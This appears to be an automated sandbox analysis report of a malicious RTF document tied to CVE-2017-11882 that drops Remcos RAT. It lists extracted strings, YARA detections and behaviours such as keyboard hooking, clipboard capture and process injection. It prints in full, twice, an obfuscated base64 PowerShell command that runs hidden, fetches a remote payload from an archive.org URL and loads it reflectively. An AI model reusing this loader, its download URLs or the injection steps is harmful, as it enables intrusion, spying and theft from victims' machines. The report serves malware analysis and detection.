                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.394160239.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.645253852.0000000000459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: RegAsm.exe, 0000000F.00000002.392868130.000000000037C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/GK
                  Source: RegAsm.exe, 00000017.00000002.645240047.000000000032C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/qK
                  Source: RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://www.msn.com/
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                  Source: RegAsm.exe, 00000014.00000002.646323313.00000000002B4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: RegAsm.exe, 0000000D.00000002.396938042.00000000003F3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.netP
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://contextual.media.net/
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                  Source: bhvB683.tmp.13.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                  Source: powershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: powershell.exe, 00000008.00000002.382702035.0000000002779000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org
                  Source: powershell.exe, 00000008.00000002.382702035.0000000002779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.382702035.0000000002DF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
                  Source: powershell.exe, 00000008.00000002.382702035.0000000002779000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVUF;HqRbase64Content
                  Source: bhvB683.tmp.13.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                  Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: powershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                  Source: powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: RegAsm.exe, 00000014.00000002.652320409.0000000000BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                  Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhv83A1.tmp.20.dr, bhvB683.tmp.13.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,000000009_2_0040A2F3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,9_2_004168FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_0040987A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004098E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_00406DFC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_00406E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004068B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_004072B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,9_2_0040A41B
                  Source: Yara matchFile source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3792, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.884633008.0000000000795000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.884633008.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.884633008.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3792, type: MEMORYSTR

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Contains functionalty to change the wallpaper
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CA73 SystemParametersInfoW,9_2_0041CA73

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 3568, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                  Source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 3792, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJlcGxhY2UoKFtjSEFyXTcyK1tjSEFyXTExMytbY0hBcl04MiksW1N0UkluZ11bY0hBcl0zNikuUmVwbGFjZSgoW2NIQXJdODYrW2NIQXJdODUrW2NIQXJdNzApLFtTdFJJbmddW2NIQXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJlcGxhY2UoKFtjSEFyXTcyK1tjSEFyXTExMytbY0hBcl04MiksW1N0UkluZ11bY0hBcl0zNikuUmVwbGFjZSgoW2NIQXJdODYrW2NIQXJdODUrW2NIQXJdNzApLFtTdFJJbmddW2NIQXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,9_2_0041812A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,9_2_0041330D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,9_2_0041BBC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,9_2_0041BB9A
